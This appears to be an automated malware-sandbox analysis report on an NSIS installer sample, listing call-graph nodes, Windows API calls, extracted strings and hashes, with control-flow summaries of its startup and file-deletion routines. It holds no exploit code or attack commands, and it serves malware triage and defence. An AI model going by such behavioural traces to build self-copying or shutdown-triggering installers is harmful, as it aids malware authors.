3230->3178 3231->3181 3232->3184 4121 401b02 4122 402a29 18 API calls 4121->4122 4123 401b09 4122->4123 4124 402a0c 18 API calls 4123->4124 4125 401b12 wsprintfA 4124->4125 4126 4028be 4125->4126 4127 401a03 4128 402a29 18 API calls 4127->4128 4129 401a0c ExpandEnvironmentStringsA 4128->4129 4130 401a20 4129->4130 4132 401a33 4129->4132 4131 401a25 lstrcmpA 4130->4131 4130->4132 4131->4132 4133 401f84 4134 401f96 4133->4134 4144 402045 4133->4144 4135 402a29 18 API calls 4134->4135 4136 401f9d 4135->4136 4138 402a29 18 API calls 4136->4138 4137 401423 25 API calls 4139 40219c 4137->4139 4140 401fa6 4138->4140 4141 401fbb LoadLibraryExA 4140->4141 4142 401fae GetModuleHandleA 4140->4142 4143 401fcb GetProcAddress 4141->4143 4141->4144 4142->4141 4142->4143 4145 402018 4143->4145 4146 401fdb 4143->4146 4144->4137 4147 404e84 25 API calls 4145->4147 4148 401423 25 API calls 4146->4148 4149 401feb 4146->4149 4147->4149 4148->4149 4149->4139 4150 402039 FreeLibrary 4149->4150 4150->4139 4165 401c8a 4166 402a0c 18 API calls 4165->4166 4167 401c90 IsWindow 4166->4167 4168 4019f3 4167->4168 4169 401490 4170 404e84 25 API calls 4169->4170 4171 401497 4170->4171 3233 403511 3234 403529 3233->3234 3235 40351b CloseHandle 3233->3235 3240 403556 3234->3240 3235->3234 3241 403564 3240->3241 3242 40352e 3241->3242 3243 403569 FreeLibrary GlobalFree 3241->3243 3244 4054bd 3242->3244 3243->3242 3243->3243 3286 40576c 3244->3286 3247 4054f1 3250 405626 3247->3250 3300 405b98 lstrcpynA 3247->3300 3248 4054da DeleteFileA 3249 40353a 3248->3249 3250->3249 3257 405e93 2 API calls 3250->3257 3252 40551b 3253 40552c 3252->3253 3254 40551f lstrcatA 3252->3254 3301 4056d2 lstrlenA 3253->3301 3255 405532 3254->3255 3258 405540 lstrcatA 3255->3258 3260 40554b lstrlenA FindFirstFileA 3255->3260 3259 40564b 3257->3259 3258->3260 3259->3249 3261 40568b 3 API calls 3259->3261 3260->3250 3281 40556f 3260->3281 3263 405655 3261->3263 3262 4056b6 CharNextA 3262->3281 3264 405850 2 API calls 3263->3264 3265 40565b RemoveDirectoryA 3264->3265 3266 405666 3265->3266 3267 40567d 3265->3267 3266->3249 3269 40566c 3266->3269 3270 404e84 25 API calls 3267->3270 3272 404e84 25 API calls 3269->3272 3270->3249 3271 405605 FindNextFileA 3273 40561d FindClose 3271->3273 3271->3281 3275 405674 3272->3275 3273->3250 3274 4055cc 3277 405850 2 API calls 3274->3277 3276 4058e6 40 API calls 3275->3276 3279 40567b 3276->3279 3280 4055d2 DeleteFileA 3277->3280 3278 4054bd 61 API calls 3278->3281 3279->3249 3285 4055dd 3280->3285 3281->3262 3281->3271 3281->3274 3281->3278 3305 405b98 lstrcpynA 3281->3305 3282 404e84 25 API calls 3282->3271 3283 404e84 25 API calls 3283->3285 3285->3271 3285->3282 3285->3283 3306 4058e6 3285->3306 3332 405b98 lstrcpynA 3286->3332 3288 40577d 3333 40571f CharNextA CharNextA 3288->3333 3291 4054d1 3291->3247 3291->3248 3292 405dfa 5 API calls 3298 405793 3292->3298 3293 4057be lstrlenA 3294 4057c9 3293->3294 3293->3298 3295 40568b 3 API calls 3294->3295 3297 4057ce GetFileAttributesA 3295->3297 3296 405e93 2 API calls 3296->3298 3297->3291 3298->3291 3298->3293 3298->3296 3299 4056d2 2 API calls 3298->3299 3299->3293 3300->3252 3302 4056df 3301->3302 3303 4056f0 3302->3303 3304 4056e4 CharPrevA 3302->3304 3303->3255 3304->3302 3304->3303 3305->3281 3339 405f28 GetModuleHandleA 3306->3339 3309 40594e GetShortPathNameA 3310 405963 3309->3310 3314 405a43 3309->3314 3313 40596b wsprintfA 3310->3313 3310->3314 3312 405932 CloseHandle GetShortPathNameA 3312->3314 3315 405946 3312->3315 3316 405bba 18 API calls 3313->3316 3314->3285 3315->3309 3315->3314 3317 405993 3316->3317 3346 40586f GetFileAttributesA CreateFileA 3317->3346 3319 4059a0 3319->3314 3320 4059af GetFileSize GlobalAlloc 3319->3320 3321 405a3c CloseHandle 3320->3321 3322 4059cd ReadFile 3320->3322 3321->3314 3322->3321 3323 4059e1 3322->3323 3323->3321 3347 4057e4 lstrlenA 3323->3347 3326 405a50 3329 4057e4 4 API calls 3326->3329 3327 4059f6 3352 405b98 lstrcpynA 3327->3352 3330 405a04 3329->3330 3331 405a17 SetFilePointer WriteFile GlobalFree 3330->3331 3331->3321 3332->3288 3334 405739 3333->3334 3336 405745 3333->3336 3335 405740 CharNextA 3334->3335 3334->3336 3338 405762 3335->3338 3337 4056b6 CharNextA 3336->3337 3336->3338 3337->3336 3338->3291 3338->3292 3340 405f44 3339->3340 3341 405f4e GetProcAddress 3339->3341 3353 405eba GetSystemDirectoryA 3340->3353 3343 4058f1 3341->3343 3343->3309 3343->3314 3345 40586f GetFileAttributesA CreateFileA 3343->3345 3344 405f4a 3344->3341 3344->3343 3345->3312 3346->3319 3348 40581a lstrlenA 3347->3348 3349 405824 3348->3349 3350 4057f8 lstrcmpiA 3348->3350 3349->3326 3349->3327 3350->3349 3351 405811 CharNextA 3350->3351 3351->3348 3352->3330 3355 405edc wsprintfA LoadLibraryExA 3353->3355 3355->3344 4179 404292 4180 4042be 4179->4180 4181 4042cf 4179->4181 4240 40543d GetDlgItemTextA 4180->4240 4183 4042db GetDlgItem 4181->4183 4188 40433a 4181->4188 4185 4042ef 4183->4185 4184 4042c9 4187 405dfa 5 API calls 4184->4187 4190 404303 SetWindowTextA 4185->4190 4195 40571f 4 API calls 4185->4195 4186 40441e 4238 4045c8 4186->4238 4242 40543d GetDlgItemTextA 4186->4242 4187->4181 4188->4186 4192 405bba 18 API calls 4188->4192 4188->4238 4193 403e54 19 API calls 4190->4193 4191 40444e 4196 40576c 18 API calls 4191->4196 4197 4043ae SHBrowseForFolderA 4192->4197 4198 40431f 4193->4198 4194 403ebb 8 API calls 4199 4045dc 4194->4199 4200 4042f9 4195->4200 4201 404454 4196->4201 4197->4186 4202 4043c6 CoTaskMemFree 4197->4202 4203 403e54 19 API calls 4198->4203 4200->4190 4204 40568b 3 API calls 4200->4204 4243 405b98 lstrcpynA 4201->4243 4205 40568b 3 API calls 4202->4205 4206 40432d 4203->4206 4204->4190 4207 4043d3 4205->4207 4241 403e89 SendMessageA 4206->4241 4210 40440a SetDlgItemTextA 4207->4210 4215 405bba 18 API calls 4207->4215 4210->4186 4211 404333 4213 405f28 5 API calls 4211->4213 4212 40446b 4214 405f28 5 API calls 4212->4214 4213->4188 4222 404472 4214->4222 4216 4043f2 lstrcmpiA 4215->4216 4216->4210 4219 404403 lstrcatA 4216->4219 4217 4044ae 4244 405b98 lstrcpynA 4217->4244 4219->4210 4220 4044b5 4221 40571f 4 API calls 4220->4221 4223 4044bb GetDiskFreeSpaceA 4221->4223 4222->4217 4225 4056d2 2 API calls 4222->4225 4227 404506 4222->4227 4226 4044df MulDiv 4223->4226 4223->4227 4225->4222 4226->4227 4228 404577 4227->4228 4229 40470e 21 API calls 4227->4229 4230 40459a 4228->4230 4231 40140b 2 API calls 4228->4231 4232 404564 4229->4232 4245 403e76 EnableWindow 4230->4245 4231->4230 4234 404579 SetDlgItemTextA 4232->4234 4235 404569 4232->4235 4234->4228 4237 404649 21 API calls 4235->4237 4236 4045b6 4236->4238 4246 404227 4236->4246 4237->4228 4238->4194 4240->4184 4241->4211 4242->4191 4243->4212 4244->4220 4245->4236 4247 404235 4246->4247 4248 40423a SendMessageA 4246->4248 4247->4248 4248->4238 4249 401595 4250 402a29 18 API calls 4249->4250 4251 40159c SetFileAttributesA 4250->4251 4252 4015ae 4251->4252 4253 401717 4254 402a29 18 API calls 4253->4254 4255 40171e SearchPathA 4254->4255 4256 401739 4255->4256 4257 402899 SendMessageA 4258 4028b3 InvalidateRect 4257->4258 4259 4028be 4257->4259 4258->4259 4260 40229a 4261 402a29 18 API calls 4260->4261 4262 4022a8 4261->4262 4263 402a29 18 API calls 4262->4263 4264 4022b1 4263->4264 4265 402a29 18 API calls 4264->4265 4266 4022bb GetPrivateProfileStringA 4265->4266 4267 403f9c 4268 403fb2 4267->4268 4273 4040bf 4267->4273 4271 403e54 19 API calls 4268->4271 4269 40412e 4270 404202 4269->4270 4272 404138 GetDlgItem 4269->4272 4278 403ebb 8 API calls 4270->4278 4274 404008 4271->4274 4275 4041c0 4272->4275 4276 40414e 4272->4276 4273->4269 4273->4270 4277 404103 GetDlgItem SendMessageA 4273->4277 4279 403e54 19 API calls 4274->4279 4275->4270 4281 4041d2 4275->4281 4276->4275 4280 404174 6 API calls 4276->4280 4298 403e76 EnableWindow 4277->4298 4283 4041fd 4278->4283 4284 404015 CheckDlgButton 4279->4284 4280->4275 4285 4041d8 SendMessageA 4281->4285 4286 4041e9 4281->4286 4296 403e76 EnableWindow 4284->4296 4285->4286 4286->4283 4289 4041ef SendMessageA 4286->4289 4287 404129 4290 404227 SendMessageA 4287->4290 4289->4283 4290->4269 4291 404033 GetDlgItem 4297 403e89 SendMessageA 4291->4297 4293 404049 SendMessageA 4294 404070 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4293->4294 4295 404067 GetSysColor 4293->4295 4294->4283 4295->4294 4296->4291 4297->4293 4298->4287 4299 40149d 4300 402241 4299->4300 4301 4014ab PostQuitMessage 4299->4301 4301->4300 4309 401b23 4310 401b30 4309->4310 4311 401b74 4309->4311 4312 40222e 4310->4312 4319 401b47 4310->4319 4313 401b78 4311->4313 4314 401b9d GlobalAlloc 4311->4314 4316 405bba 18 API calls 4312->4316 4324 401bb8 4313->4324 4330 405b98 lstrcpynA 4313->4330 4315 405bba 18 API calls 4314->4315 4315->4324 4318 40223b 4316->4318 4322 405459 MessageBoxIndirectA 4318->4322 4328 405b98 lstrcpynA 4319->4328 4320 401b8a GlobalFree 4320->4324 4322->4324 4323 401b56 4329 405b98 lstrcpynA 4323->4329 4326 401b65 4331 405b98 lstrcpynA 4326->4331 4328->4323 4329->4326 4330->4320 4331->4324 4332 4021a5 4333 402a29 18 API calls 4332->4333 4334 4021ab 4333->4334 4335 402a29 18 API calls 4334->4335 4336 4021b4 4335->4336 4337 402a29 18 API calls 4336->4337 4338 4021bd 4337->4338 4339 405e93 2 API calls 4338->4339 4340 4021c6 4339->4340 4341 4021d7 lstrlenA lstrlenA 4340->4341 4342 4021ca 4340->4342 4344 404e84 25 API calls 4341->4344 4343 404e84 25 API calls 4342->4343 4346 4021d2 4342->4346 4343->4346 4345 402213 SHFileOperationA 4344->4345 4345->4342 4345->4346 4347 402227 4348 40222e 4347->4348 4352 402241 4347->4352 4349 405bba 18 API calls 4348->4349 4350 40223b 4349->4350 4351 405459 MessageBoxIndirectA 4350->4351 4351->4352 4353 401ca7 4354 402a0c 18 API calls 4353->4354 4355 401cae 4354->4355 4356 402a0c 18 API calls 4355->4356 4357 401cb6 GetDlgItem 4356->4357 4358 4024eb 4357->4358 4358->4358 4359 4035a9 4360 4035b4 4359->4360 4361 4035b8 4360->4361 4362 4035bb GlobalAlloc 4360->4362 4362->4361 4363 40262e 4364 402635 4363->4364 4365 4028be 4363->4365 4366 40263b FindClose 4364->4366 4366->4365 4367 4026af 4368 402a29 18 API calls 4367->4368 4370 4026bd 4368->4370 4369 4026d3 4372 405850 2 API calls 4369->4372 4370->4369 4371 402a29 18 API calls 4370->4371 4371->4369 4373 4026d9 4372->4373 4393 40586f GetFileAttributesA CreateFileA 4373->4393 4375 4026e6 4376 4026f2 GlobalAlloc 4375->4376 4377 40278f 4375->4377 4378 402786 CloseHandle 4376->4378 4379 40270b 4376->4379 4380 402797 DeleteFileA 4377->4380 4381 4027aa 4377->4381 4378->4377 4394 4030b3 SetFilePointer 4379->4394 4380->4381 4383 402711 4384 403081 ReadFile 4383->4384 4385 40271a GlobalAlloc 4384->4385 4386 40272a 4385->4386 4387 40275e WriteFile GlobalFree 4385->4387 4389 402e8e 37 API calls 4386->4389 4388 402e8e 37 API calls 4387->4388 4390 402783 4388->4390 4392 402737 4389->4392 4390->4378 4391 402755 GlobalFree 4391->4387 4392->4391 4393->4375 4394->4383 4395 4027b0 4396 402a0c 18 API calls 4395->4396 4397 4027b6 4396->4397 4398 4027f1 4397->4398 4399 4027da 4397->4399 4400 40268f 4397->4400 4401 402807 4398->4401 4402 4027fb 4398->4402 4403 4027df 4399->4403 4408 4027ee 4399->4408 4405 405bba 18 API calls 4401->4405 4404 402a0c 18 API calls 4402->4404 4409 405b98 lstrcpynA 4403->4409 4404->4408 4405->4408 4408->4400 4410 405af6 wsprintfA 4408->4410 4409->4400 4410->4400 4411 401eb2 4412 402a29 18 API calls 4411->4412 4413 401eb9 4412->4413 4414 405e93 2 API calls 4413->4414 4415 401ebf 4414->4415 4417 401ed1 4415->4417 4418 405af6 wsprintfA 4415->4418 4418->4417 3356 4015b3 3357 402a29 18 API calls 3356->3357 3358 4015ba 3357->3358 3359 40571f 4 API calls 3358->3359 3374 4015c2 3359->3374 3360 40161c 3362 401621 3360->3362 3363 40164a 3360->3363 3361 4056b6 CharNextA 3361->3374 3383 401423 3362->3383 3366 401423 25 API calls 3363->3366 3369 401642 3366->3369 3371 401633 SetCurrentDirectoryA 3371->3369 3372 401604 GetFileAttributesA 3372->3374 3374->3360 3374->3361 3374->3372 3375 4053e0 3374->3375 3378 405346 CreateDirectoryA 3374->3378 3387 4053c3 CreateDirectoryA 3374->3387 3376 405f28 5 API calls 3375->3376 3377 4053e7 3376->3377 3377->3374 3379 405397 GetLastError 3378->3379 3381 405393 3378->3381 3380 4053a6 SetFileSecurityA 3379->3380 3379->3381 3380->3381 3382 4053bc GetLastError 3380->3382 3381->3374 3382->3381 3384 404e84 25 API calls 3383->3384 3385 401431 3384->3385 3386 405b98 lstrcpynA 3385->3386 3386->3371 3388 4053d3 3387->3388 3389 4053d7 GetLastError 3387->3389 3388->3374 3389->3388 4419 4016b3 4420 402a29 18 API calls 4419->4420 4421 4016b9 GetFullPathNameA 4420->4421 4424 4016d0 4421->4424 4428 4016f1 4421->4428 4422 401705 GetShortPathNameA 4423 4028be 4422->4423 4425 405e93 2 API calls 4424->4425 4424->4428 4426 4016e1 4425->4426 4426->4428 4429 405b98 lstrcpynA 4426->4429 4428->4422 4428->4423 4429->4428 4430 402336 4431 40233c 4430->4431 4432 402a29 18 API calls 4431->4432 4433 40234e 4432->4433 4434 402a29 18 API calls 4433->4434 4435 402358 RegCreateKeyExA 4434->4435 4436 402382 4435->4436 4439 4028be 4435->4439 4437 402a29 18 API calls 4436->4437 4438 40239a 4436->4438 4440 402393 lstrlenA 4437->4440 4441 402a0c 18 API calls 4438->4441 4443 4023a6 4438->4443 4440->4438 4441->4443 4442 4023c1 RegSetValueExA 4445 4023d7 RegCloseKey 4442->4445 4443->4442 4444 402e8e 37 API calls 4443->4444 4444->4442 4445->4439 4447 402836 4448 402a0c 18 API calls 4447->4448 4449 40283c 4448->4449 4450 40284a 4449->4450 4451 40286d 4449->4451 4453 40268f 4449->4453 4450->4453 4455 405af6 wsprintfA 4450->4455 4452 405bba 18 API calls 4451->4452 4451->4453 4452->4453 4455->4453 4456 4014b7 4457 4014bd 4456->4457 4458 401389 2 API calls 4457->4458 4459 4014c5 4458->4459 3390 401e38 3391 402a29 18 API calls 3390->3391 3392 401e3e 3391->3392 3393 404e84 25 API calls 3392->3393 3394 401e48 3393->3394 3406 4053f8 CreateProcessA 3394->3406 3396 401ea4 CloseHandle 3400 40268f 3396->3400 3397 401e6d WaitForSingleObject 3398 401e4e 3397->3398 3399 401e7b GetExitCodeProcess 3397->3399 3398->3396 3398->3397 3398->3400 3409 405f64 3398->3409 3402 401e98 3399->3402 3403 401e8d 3399->3403 3402->3396 3405 401e96 3402->3405 3413 405af6 wsprintfA 3403->3413 3405->3396 3407 405433 3406->3407 3408 405427 CloseHandle 3406->3408 3407->3398 3408->3407 3410 405f81 PeekMessageA 3409->3410 3411 405f91 3410->3411 3412 405f77 DispatchMessageA 3410->3412 3411->3397 3412->3410 3413->3405 4460 401d38 GetDC GetDeviceCaps 4461 402a0c 18 API calls 4460->4461 4462 401d54 MulDiv 4461->4462 4463 402a0c 18 API calls 4462->4463 4464 401d69 4463->4464 4465 405bba 18 API calls 4464->4465 4466 401da2 CreateFontIndirectA 4465->4466 4467 4024eb 4466->4467 4475 402539 4476 402a0c 18 API calls 4475->4476 4479 402543 4476->4479 4477 4025b9 4478 402577 ReadFile 4478->4477 4478->4479 4479->4477 4479->4478 4480 4025bb 4479->4480 4481 4025cb 4479->4481 4484 405af6 wsprintfA 4480->4484 4481->4477 4483 4025e1 SetFilePointer 4481->4483 4483->4477 4484->4477 3650 40173e 3651 402a29 18 API calls 3650->3651 3652 401745 3651->3652 3653 40589e 2 API calls 3652->3653 3654 40174c 3653->3654 3655 40589e 2 API calls 3654->3655 3655->3654 4485 40193f 4486 402a29 18 API calls 4485->4486 4487 401946 lstrlenA 4486->4487 4488 4024eb 4487->4488

                                                                                                                        Executed Functions

                                                                                                                        Function 004030FB Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 315stringfilecomCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 4030fb-403131 SetErrorMode GetVersion 1 403133-40313b call 405f28 0->1 2 403144 0->2 1->2 7 40313d 1->7 4 403149-40315c call 405eba lstrlenA 2->4 9 40315e-4031d0 call 405f28 * 2 #17 OleInitialize SHGetFileInfoA call 405b98 GetCommandLineA call 405b98 GetModuleHandleA 4->9 7->2 18 4031d2-4031d7 9->18 19 4031dc-4031f1 call 4056b6 CharNextA 9->19 18->19 22 40325a-40325e 19->22 23 403260 22->23 24 4031f3-4031f6 22->24 27 403273-40328b GetTempPathA call 4030ca 23->27 25 4031f8-4031fc 24->25 26 4031fe-403206 24->26 25->25 25->26 28 403208-403209 26->28 29 40320e-403211 26->29 37 4032b1-4032cb DeleteFileA call 402c55 27->37 38 40328d-4032ab GetWindowsDirectoryA lstrcatA call 4030ca 27->38 28->29 31 403213-403217 29->31 32 40324a-403257 call 4056b6 29->32 35 403229-40322f 31->35 36 403219-403222 31->36 32->22 49 403259 32->49 39 403241-403248 35->39 40 403231-40323a 35->40 36->35 43 403224 36->43 50 403332-403341 ExitProcess OleUninitialize 37->50 51 4032cd-4032d3 37->51 38->37 38->50 39->32 47 403262-40326e call 405b98 39->47 40->39 46 40323c 40->46 43->35 46->39 47->27 49->22 55 403456-40345c 50->55 56 403347-403357 call 405459 ExitProcess 50->56 53 403322-403329 call 4035eb 51->53 54 4032d5-4032de call 4056b6 51->54 62 40332e 53->62 68 4032e9-4032eb 54->68 60 403462-40347f call 405f28 * 3 55->60 61 4034f9-403501 55->61 83 403481-403483 60->83 84 4034c9-4034d7 call 405f28 60->84 64 403503 61->64 65 403507-40350b ExitProcess 61->65 62->50 64->65 71 4032e0-4032e6 68->71 72 4032ed-4032f7 68->72 71->72 74 4032e8 71->74 75 4032f9-403306 call 40576c 72->75 76 40335d-403371 call 4053e0 lstrcatA 72->76 74->68 75->50 87 403308-40331e call 405b98 * 2 75->87 85 403373-403379 lstrcatA 76->85 86 40337e-403398 lstrcatA lstrcmpiA 76->86 83->84 90 403485-403487 83->90 97 4034e5-4034f0 ExitWindowsEx 84->97 98 4034d9-4034e3 84->98 85->86 86->50 88 40339a-40339d 86->88 87->53 92 4033a6 call 4053c3 88->92 93 40339f-4033a4 call 405346 88->93 90->84 95 403489-40349b GetCurrentProcess 90->95 105 4033ab-4033b8 SetCurrentDirectoryA 92->105 93->105 95->84 111 40349d-4034bf 95->111 97->61 104 4034f2-4034f4 call 40140b 97->104 98->97 98->104 104->61 109 4033c5-4033df call 405b98 105->109 110 4033ba-4033c0 call 405b98 105->110 116 4033e4-403400 call 405bba DeleteFileA 109->116 110->109 111->84 119 403441-403448 116->119 120 403402-403412 CopyFileA 116->120 119->116 122 40344a-403451 call 4058e6 119->122 120->119 121 403414-403434 call 4058e6 call 405bba call 4053f8 120->121 121->119 131 403436-40343d CloseHandle 121->131 122->50 131->119
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE ref: 00403121
                                                                                                                        • GetVersion.KERNEL32 ref: 00403127
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                                                                                        • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00403178
                                                                                                                        • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                                                                                        • GetCommandLineA.KERNEL32(jtlkrtaftpgmppuxhth Setup,NSIS Error), ref: 004031A9
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000), ref: 004031BC
                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",00409168), ref: 004031E7
                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                                                                                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                        • ExitProcess.KERNEL32(00000020), ref: 00403332
                                                                                                                        • OleUninitialize.OLE32(00000020), ref: 00403337
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403357
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000,00000020), ref: 0040336A
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000,00000020), ref: 00403379
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000,00000020), ref: 00403384
                                                                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 00403390
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                                                                                        • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\BMhDm7YW62.exe,0041F0F0,00000001), ref: 0040340A
                                                                                                                        • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040350B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\BMhDm7YW62.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BMhDm7YW62.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$jtlkrtaftpgmppuxhth Setup$~nsu
                                                                                                                        • API String ID: 1031542678-940376697
                                                                                                                        • Opcode ID: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                                                                                                        • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                                                                                        • Opcode Fuzzy Hash: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                                                                                                        • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004054BD Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 376 4054bd-4054d8 call 40576c 379 4054f1-4054fb 376->379 380 4054da-4054ec DeleteFileA 376->380 382 4054fd-4054ff 379->382 383 40550f-40551d call 405b98 379->383 381 405685-405688 380->381 384 405630-405636 382->384 385 405505-405509 382->385 391 40552c-40552d call 4056d2 383->391 392 40551f-40552a lstrcatA 383->392 384->381 387 405638-40563b 384->387 385->383 385->384 389 405645-40564d call 405e93 387->389 390 40563d-405643 387->390 389->381 400 40564f-405664 call 40568b call 405850 RemoveDirectoryA 389->400 390->381 393 405532-405535 391->393 392->393 396 405540-405546 lstrcatA 393->396 397 405537-40553e 393->397 399 40554b-405569 lstrlenA FindFirstFileA 396->399 397->396 397->399 401 405626-40562a 399->401 402 40556f-405586 call 4056b6 399->402 412 405666-40566a 400->412 413 40567d-405680 call 404e84 400->413 401->384 404 40562c 401->404 410 405591-405594 402->410 411 405588-40558c 402->411 404->384 415 405596-40559b 410->415 416 4055a7-4055b5 call 405b98 410->416 411->410 414 40558e 411->414 412->390 418 40566c-40567b call 404e84 call 4058e6 412->418 413->381 414->410 420 405605-405617 FindNextFileA 415->420 421 40559d-40559f 415->421 426 4055b7-4055bf 416->426 427 4055cc-4055db call 405850 DeleteFileA 416->427 418->381 420->402 424 40561d-405620 FindClose 420->424 421->416 425 4055a1-4055a5 421->425 424->401 425->416 425->420 426->420 429 4055c1-4055ca call 4054bd 426->429 436 4055fd-405600 call 404e84 427->436 437 4055dd-4055e1 427->437 429->420 436->420 439 4055e3-4055f3 call 404e84 call 4058e6 437->439 440 4055f5-4055fb 437->440 439->420 440->420
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                                                                                        • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                                                                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                                                                                        • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040560F
                                                                                                                        • FindClose.KERNELBASE(?), ref: 00405620
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
